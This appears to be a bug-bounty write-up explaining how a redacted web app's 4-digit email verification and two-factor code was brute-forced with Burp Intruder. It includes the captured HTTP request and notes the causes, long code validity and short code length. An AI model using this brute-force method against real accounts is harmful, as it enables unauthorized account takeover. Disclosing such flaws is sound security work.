.png)
6 months ago
23 BOOK THIS SPACE FOR AD
ARTICLE ADSteps:
Create account by email, I am using this email free@Palestine.comNow app send verification code to your email “free@Palestine.com” and you will be redirect to this page https://app.Redacted.com/register/code-verification3. write any random code, I used 5555 as 2FA
4. Enable a HTTP interception proxy, such as Burp Suite or OWASP ZAP
Request:
POST /api/auth/resolve-email-verification-code HTTP/2Host: app.Redacted.com
Cookie: [Redacted]
Content-Length: 38
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"
Pragma: no-cache
Sec-Ch-Ua-Mobile: ?0
X-Site-Context: [Redacted]
User-Agent: [Redacted]
Content-Type: application/json
Accept: application/json, text/plain, */*
X-Client-Data: [Redacted]
Sec-Ch-Ua-Platform: "Linux"
Origin: [Redacted]
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: [Redacted]
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
{"email":"free@Palestine.com","code":5555}
5. I used the intruder in burp, select part of the verification code and my payload is a number from 0000 to 9999.
6. After starting and few minutes i can bypass this code by valid code “6712”, and login was successful.
The site was also affected by the same vulnerability on another endpoint: https://app.Redacted.com/login/code-verification
Which also allows you to bypass two-factor authentication
This is due to two reasons, even if there is a temporary ban “Rate limit” to confirm the verification code, but the code is valid for a time longer than the mentioned “10 minutes”.
The second reason is that the verification code must be 6 or more numbers or a combination of letters and numbers, depending on the secure design.
Bengali (Bangladesh) · 
English (United States) ·